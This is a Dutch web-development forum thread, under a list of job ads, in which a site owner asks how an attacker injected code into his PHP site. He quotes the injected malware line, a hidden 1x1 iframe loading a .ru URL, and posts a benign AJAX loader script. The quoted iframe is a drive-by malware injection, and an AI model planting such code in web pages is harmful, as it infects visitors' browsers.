Beveiligings issue

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

PHP ontwikkelaar

Functie Jij komt te werken in een development team van 9 man. Het grootste deel doet back end development en daarnaast is er 1 teamlead en 1 tester in het team. Dit Agile team is van groots belang voor de organisatie omdat zij voornamelijk alle eigen systemen in-house ontwikkelen. Naast het door ontwikkelen van het bestaande platform en de software die daarbij komt kijken, zul jij je ook bezighouden met het realiseren en opzetten van nieuwe projecten binnen het bedrijf. Je staat nauw met de klant in contact om zo hun wensen zo goed mogelijk te kunnen realiseren. Daarnaast ontwikkel

Bekijk vacature »

Front-end Developer (HTML/CSS, Angular/React/Vue,

Functie Je zal aan de slag gaan in een klein, hecht team met front-end development experts die de ambitie delen mooi werk te leveren. Samen met hen zal je werken aan het gebruiksvriendelijk en interactief maken van complexe webapplicaties, websites en mobile apps. Je levert klanten wat ze nodig hebben terwijl je actief aan jezelf blijft werken met de ondersteuning vanuit je werkplek. Talen als Javascript programmeer jij vloeiend en je hebt kennis van frameworks als React en Angular. Je zou je het liefst nog veel meer ontwikkelen in verschillende front-end talen. Deze kennis deel je graag met je collega’s,

Bekijk vacature »

PHP developer (Laravel/Vue.js)

Functie Het team telt momenteel 20 collega’s, bestaande uit developers (front- en backend) en het operations team, waaronder ook het management en twee scrum masters vallen. Ze zijn op zoek naar een PHP developer die in staat is zelfstandig te werken. Je komt te werken in één van de drie scrumteams en gaat aan de slag met een project voor de klant. Het fijne hieraan is dat je wel afwisseling hebt qua werk, maar tegelijkertijd doorlopend werkt voor bestaande klanten. Hierdoor krijg je ook de kans om echt de diepte in te gaan en innovatieve technische oplossingen neer te zetten.

Bekijk vacature »

PHP Developer - medior functie

Functieomschrijving Ben jij innovatief en wil jij je kennis graag delen met jouw nieuwe collega's? Lees dan snel verder! Voor een leuke opdrachtgever in de omgeving van Roosendaal zoeken wij een Symfony developer. Of je nou junior, medior of senior bent, je krijgt hier alle vrijheid en verantwoordelijkheid om jouw eigen loopbaan te ontwikkelen. Je gaat je hier bezig houden met en inspelen op de actualiteiten van jouw vakgebied. Techstack: Symfony, PHP, mySQL. Kennis van Svelte is helemaal mooi meegenomen. Bedrijfsprofiel Al sinds '99 is dit webbureau actief. De kernwaarden binnen het bedrijf zijn integer, dienstbaar en deskundig. Je komt

Bekijk vacature »

Front end developer

Functie Het team bestaat uit User Experience designers, Data Scientists en Software Engineers met passie voor hun vak. De consultants en ontwikkelaars werken volgens de Design Thinking methode waarbij de eerste stappen van ontwerp en ontwikkeling zullen samenkomen in een proof of concept. Nadat is vastgesteld dat de oplossing voldoet aan de belangrijkste behoeftes worden producten of services gevalideerd door middel van korte iteraties. Hiermee zorgen ze ervoor dat het werk voldoet aan de technische vereisten en gebruikersbehoefte. Door het inzetten van de nieuwste technologieën die toekomstbestendig zijn weten ze klanten omver te blazen. Ook geven en organiseren ze veel

Bekijk vacature »

Software Developer Mendix / Maatschappelijk Betrok

Dit ga je doen Het bouwen van de Mendix applicaties in samenwerking met jouw team of zelfstandig; Werken met Scrum methodiek; Ontwikkelen van vooruitstrevende oplossingen; Meedenken over nieuwe applicaties en ontwikkelingen; On the job eigen maken van de Mendix omgeving. Hier ga je werken Deze dynamische en snelgroeiende organisatie begeeft zich in de recyclingbranche. Zij nemen op duurzame en efficiënte manier de recycling op zich. Vanwege hun snelle groei zijn zij op zoek naar een young professional die zich graag wilt ontwikkelen als Mendix Developer. Je komt te werken binnen een IT team van +/- 15 medewerkers. Het huidige ‘vaste’

Bekijk vacature »

Mendix Ontwikkelaar - Vernieuwen van het applicati

Bedrijfsomschrijving De ontwikkelingen in de transportsector gaan razendsnel. Bij ons kun je een belangrijke rol spelen in deze sector. We streven ernaar om onze klanten te ontzorgen op het gebied van continuïteit en veiligheid met innovatieve producten en diensten. We willen dat onze klanten de veiligste vervoerders van Europa worden. Ons team werkt hard om deze ambitieuze doelstellingen te bereiken en we bieden een motiverende werkomgeving aan. We zijn op zoek naar zelfstarters met een focus op resultaat en beslissingsbevoegdheid. Functieomschrijving Als Mendix ontwikkelaar bij deze organisatie heb je een gevarieerde baan. Het applicatielandschap wordt vernieuwd en de “schade en

Bekijk vacature »

PHP Developer

Functie Middels Scrum en sprints bouw jij in deze functie mee aan complexe webapplicaties en ons SaaS platform. Hierbij hoort ook architectuur tot een van je taken. Daarnaast ben je één van de leden van het Scrum team. Dat betekent dat je naast je kerntaken ook in contact staat met de product owner. Oftewel, je bent bij het gehele ontwikkelproces betrokken. Tools die hierbij gebruikt worden zijn o.a. PHP, Symfony en Git. Eisen • Minimaal HBO werk- en denkniveau • Minimaal 3 jaar aantoonbare ervaring met PHP • Kennis en ervaring Symfony (Laravel is pré) & Lando • Kennis van

Bekijk vacature »

Java Developer

Vacature details Vakgebied: Software/IT Opleiding: Senior Werklocatie: Eindhoven Vacature ID: 12946 Introductie We are looking for a Java Developer! Our client is one of the most innovation companies located within the Netherlands. We provide high quality software in a high-tech and challenging market. Functieomschrijving The department is specialized in creating and developing high quality software for manufacturing automation in a high tech environment. We strive to provide our clients with high quality software and deliver state of the art solutions in a variety of ways. Creating software infrastructure using Java SE / EE Create applications to fine tune manufacturing processes

Bekijk vacature »

Java Developer / Sociaal domein

Dit ga je doen Nieuwbouw en doorontwikkeling; Beheer en wanneer nodig onderhoud; Bijdrage leveren in het functioneel- en technisch ontwerptraject; Analyseren van productie verstoringen; Meedenken over vernieuwingen en verbeteringen. Hier ga je werken De organisatie waar jij komt te werken focust zich op software development met een maatschappelijk tintje. De afdeling software ontwikkeling bestaat uit vijf verschillende scrum teams, met allen hun eigen focus gebied. Zo zijn er een aantal teams die zich focussen op specifieke applicaties, maar is er ook een team gericht op projecten. Binnen de organisatie staat innovatie en kwaliteit voorop. Een aantal applicaties draait nog op

Bekijk vacature »

Senior front-end developer (React)

Functie Momenteel zijn ze op zoek naar een ervaren front-end developer. Als senior werk je nauw samen met 5 collega developers. Een klein scrum team dus, met korte lijnen waardoor jouw ideeën snel tot uitvoering gebracht kunnen worden. De huidige applicaties worden veelal ontwikkeld met o.a. React, Redux, TypeScript. Ze zijn echt op zoek naar een kartrekker in het team. Naast het meedenken over, opzetten en uitvoeren van bijvoorbeeld de architectuur of toepassing van nieuwe technieken krijg je ook veel tijd om de meer junior (front-end) developers te begeleiden. Hierin nemen ze graag de tijd om mensen de ruimte te

Bekijk vacature »

Backend Developer PHP Laravel SaaS

Dit ga je doen Het ontwikkelen van nieuwe features die bijdragen aan de groei van de klanten van de organisatie; Je denkt mee over nieuwe innovaties, features en verbeteringen in de applicatiearchitectuur; Je draagt bij aan de continue ontwikkeling van jouw team doordat je elke dag streeft naar het verbeteren van jouw eigen prestaties; Je neemt actief deel aan Scrum meetings en de Backend Guild. Hier ga je werken Voor een snel groeiend bedrijf, in de regio Nieuw Vennep, zijn wij opzoek naar een ervaren Backend Developer. De organisatie is actief in de e-commercebranche en ontzorgt haar klanten middels een

Bekijk vacature »

Low-Code Expert/Developer: Power Platform Speciali

Bedrijfsomschrijving Als Low-Code Expert/Developer bij ons innovatieve bedrijf, neem je een cruciale rol op je in de creatie, ondersteuning en implementatie van diverse oplossingen met behulp van het veelzijdige Power Platform. Dit platform omvat Power Apps, Power BI, Power Automate, Power Virtual Agent en Azure Logic Apps. Het Power Platform biedt je de mogelijkheid om klanten te voorzien van naadloze integraties door op maat gemaakte oplossingen te creëren die compatibel zijn met (bijna) alle bestaande software-infrastructuren. Dankzij het uitgebreide scala aan toepassingen, krijg je de kans om als architect en projectleider van je eigen oplossing te fungeren. Dompel jezelf onder

Bekijk vacature »

Fullstack developer

Functie omschrijving We are looking for a dutch native speaker Wil jij werken als Senior Developer en werken aan een applicatie die duizenden marketingcampagnes automatisch aanstuurt? Dit is je kans! Kom werken voor onze opdrachtgever en in deze rol zul je veel vrijheid en verantwoordelijkheid krijgen om gezamenlijk de applicatie naar een hoger plan te tillen. Wat ga je verder doen: Optimaliseren, beheren en uitbreiden van onze applicatie; Het bouwen van aansluitingen op de systemen van partners middels API’s; Meedenken over de technische/ontwikkel-standaarden; Proactief verbeterpunten voorstellen. Bedrijfsprofiel Het is een organisatie die met een team van verschillende developers én marketeers

Bekijk vacature »

Software developer

Functieomschrijving Voor een gewaardeerde werkgever in de regio van Middelburg zijn wij op zoek naar een ambitieuze PHP/Symfony Developer. Een enthousiast persoon die het development team komt versterken met het aanpakken van complexe en nieuwe projecten. Ben jij op zoek naar een baan met veel uitdaging binnen een snelgroeiend e-commerce bedrijf, waar je de tijd en ruimte krijgt voor zowel persoonlijke als professionele groei? Lees dan snel verder! Dit ga je doen: Aanpassingssuggesties van collega’s in kaart brengen, vervolgens te analyseren en daarna te concluderen of de aanpassing een verbetering is; Ontwikkeling en beheer van de serviceportal in Symfony en

Bekijk vacature »
Sander b

sander b

02/08/2008 21:18:00
Quote Anchor link
Hallo allemaal,

Sinds een aantal maanden gebruik ik wat simpele OOP scriptjes die ik gevonden heb op dynamic drive. Het volgende verbazende probleem deed zich voor; op mijn site werd een virus geconstateerd door Avast.

Na wat doorzoeken van de scripts blijkt een "cracker" een code in mijn scripts geplaatst te hebben dat een website opent;
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<body><iframe width=1 height=1 border=0 frameborder=0 src="http://wfrules.ru/rotate/index.php"></iframe>


Dit brengt de volgende vragen met zich mee; hoe hebben ze dit kunnen doen? Kan dit door ajax te gebruiken gebeuren? Hoe stel ik mijn website in veiligheid hiertegen?

Weet iemand dit te beantwoorden?

Alvast bedankt:)
 
PHP hulp

PHP hulp

21/11/2024 23:43:49
 
--

--

02/08/2008 21:21:00
Quote Anchor link
Misschien is dat gekomen door onveilig includen..?
 

02/08/2008 21:22:00
Quote Anchor link
Welk scriptje is het?
 
Sander b

sander b

02/08/2008 21:23:00
Quote Anchor link
En wat is onveilig includen precies?
 

02/08/2008 21:26:00
Quote Anchor link
Zie ook dit.
 
Sander b

sander b

02/08/2008 21:28:00
Quote Anchor link
Het is een behoorlijk groot script;

De code waarmee ik het aanroep
onMouseOver="ajax_loadContent('contentarea_z','uitleg.php?u=home');return false"

De code waarin ik het laad

<div id="contentarea_z" class="fl_14_pre">
</div>

De JS van DHTMLgoodies (mijn excuses, niet dynamic drive)

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
var enableCache = true;

var jsCache = new Array();



var dynamicContent_ajaxObjects = new Array();



function ajax_showContent(divId,ajaxIndex,url)

{

    var targetObj = document.getElementById(divId);

    targetObj.innerHTML = dynamicContent_ajaxObjects[ajaxIndex].response;

    if(enableCache){

        jsCache[url] =     dynamicContent_ajaxObjects[ajaxIndex].response;

    }

    dynamicContent_ajaxObjects[ajaxIndex] = false;

    

    ajax_parseJs(targetObj)

}



function ajax_loadContent(divId,url)

{

    if(enableCache && jsCache[url]){

        document.getElementById(divId).innerHTML = jsCache[url];

        ajax_parseJs(document.getElementById(divId))

        evaluateCss(document.getElementById(divId))

        return;

    }

    

    var ajaxIndex = dynamicContent_ajaxObjects.length;

    document.getElementById(divId).innerHTML = 'Loading content - please wait';

    dynamicContent_ajaxObjects[ajaxIndex] = new sack();

    

    if(url.indexOf('?')>=0){

        dynamicContent_ajaxObjects[ajaxIndex].method='GET';

        var string = url.substring(url.indexOf('?'));

        url = url.replace(string,'');

        string = string.replace('?','');

        var items = string.split(/&/g);

        for(var no=0;no<items.length;no++){

            var tokens = items[no].split('=');

            if(tokens.length==2){

                dynamicContent_ajaxObjects[ajaxIndex].setVar(tokens[0],tokens[1]);

            }    

        }    

        url = url.replace(string,'');

    }



    

    dynamicContent_ajaxObjects[ajaxIndex].requestFile = url;    // Specifying which file to get

    dynamicContent_ajaxObjects[ajaxIndex].onCompletion = function(){ ajax_showContent(divId,ajaxIndex,url); };    // Specify function that will be executed after file has been found

    dynamicContent_ajaxObjects[ajaxIndex].runAJAX();        // Execute AJAX function    

    

    

}



function ajax_parseJs(obj)

{

    var scriptTags = obj.getElementsByTagName('SCRIPT');

    var string = '';

    var jsCode = '';

    for(var no=0;no<scriptTags.length;no++){    

        if(scriptTags[no].src){

            var head = document.getElementsByTagName("head")[0];

            var scriptObj = document.createElement("script");

    

            scriptObj.setAttribute("type", "text/javascript");

            scriptObj.setAttribute("src", scriptTags[no].src);      

        }else{

            if(navigator.userAgent.toLowerCase().indexOf('opera')>=0){

                jsCode = jsCode + scriptTags[no].text + '\n';

            }

            else

                jsCode = jsCode + scriptTags[no].innerHTML;    

        }

        

    }



    if(jsCode)ajax_installScript(jsCode);

}





function ajax_installScript(script)

{        

    if (!script)

        return;        

    if (window.execScript){            

        window.execScript(script)

    }else if(window.jQuery && jQuery.browser.safari){ // safari detection in jQuery

        window.setTimeout(script,0);

    }else{            

        window.setTimeout( script, 0 );

    }

}    

    

    

function evaluateCss(obj)

{

    var cssTags = obj.getElementsByTagName('STYLE');

    var head = document.getElementsByTagName('HEAD')[0];

    for(var no=0;no<cssTags.length;no++){

        head.appendChild(cssTags[no]);

    }    

}
 

02/08/2008 21:31:00
Quote Anchor link
Nou, daar ligt het niet aan. Het ligt aan jou php. Oh, en je had wel een link naar dat scriptje mogen doen hoor, dat had je hier helemaal niet hoeven plaatsen.
Gewijzigd op 01/01/1970 01:00:00 door
 
Sander b

sander b

02/08/2008 21:33:00
Quote Anchor link
Oke, dus include (wat ik regelmatig doe) is gevaarlijk? Hoe kan ik veilig includen?

Bedankt voor het helpen trouwens:)
 
Sander b

sander b

02/08/2008 21:34:00
Quote Anchor link
Trouwens, sorry voor dat hele script, maar mijn website is oppeens offline nadat ik de hele public html heb leeg gemaakt als map. Heb ik iets doms gedaan? Of is dit toevallig.

En ik bedoel dus de hele server valt niet te bereiken:p niet dat mijn index niet geladen kan worden want dat lijkt mij inderdaad wel logisch.
Niet Bumpen::
Twee of meer keer achter elkaar in een topic posten heet bumpen. Bumpen is pas na 24 uur toegestaan en kan een reden zijn voor de admins en moderators om een topic te sluiten. Gebruik indien nodig de Afbeelding knop om je tekst aan te passen.

SanThe.
Gewijzigd op 01/01/1970 01:00:00 door sander b
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.